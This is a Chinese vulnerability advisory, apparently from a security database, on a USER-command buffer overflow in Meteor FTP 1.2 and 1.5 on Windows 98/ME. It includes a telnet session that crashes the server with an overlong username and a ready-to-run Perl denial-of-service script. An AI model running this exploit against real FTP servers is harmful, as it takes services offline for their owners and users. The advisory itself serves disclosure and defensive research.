发布日期：2003-08-08
更新日期：2005-05-25

受影响系统：

MeteorSoft Meteor FTP 1.2
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
MeteorSoft Meteor FTP 1.5
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98

描述：

---

BUGTRAQ  ID: 8376

Meteor FTP是一款使用在Windows下的FTP服务程序。

Meteor FTP的USER命令缺少充分的缓冲区边界检查，远程攻击者可以利用这个漏洞对服务进行拒绝服务攻击，精心提交字符串数据可能以FTP进程权限在系统上执行任意指令。

通过连接Meteor FTP服务程序，发送包含超长字符串作为参数的USER命令，可使FTP服务崩溃，精心构建用户名数据可能以FTP进程权限在系统上执行任意指令。

如果以恰当的参数发布PASS和PORT命令的话，内存破坏还可能导致缓冲区溢出。

<*来源：Zee （zerash@evicted.org）
        Auston J （Anix44@gmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=106045414403076&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Zee （zerash@evicted.org）提供了如下测试方法：

root@openwire # telnet 192.168.1.14 21
Trying 192.168.1.14...
Connected to 192.168.1.14.
Escape character is '^]'.
220 Service ready for new user
USER
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
530 Not logged on
QUIT
Connection closed by foreign host.

#!/usr/bin/perl
#
# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5
#
# A vulnerability has been identified in Meteor FTP Version 1.5, which
# allows malicious users to remotely crash the ftpd. By connecting to the
# ftpd and issuing USER followed by large amounts of data, the server
# crashes. For more info, go to :
# http://www.evicted.org/projects/writings/mftpadvisory.txt
#
# Usage : ./meteordos.pl <host/ip>
#
# Vulnerability & code by zerash
# Contact : zerash@evicted.org

use Net::FTP;
$host = $ARGV[0];

if("$ARGV[0]" eq "") {
    print("DoS against Meteor FTP Version 1.5 by zerash\@evicted.org\n");
    die("Usage : ./meteorftpdos <host\/ip>\n");
} else {    
    
    print("Connecting to $host...\n");
    my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\n";
    print("Connected!\n");
    print("Attempting to exploit the ftpd...");
    $ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');  $ftp->quit;
    print("Success!\n");
}

建议：

---

厂商补丁：

MeteorSoft
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://66.235.19.241/

浏览次数：3363
严重程度：10（网友投票）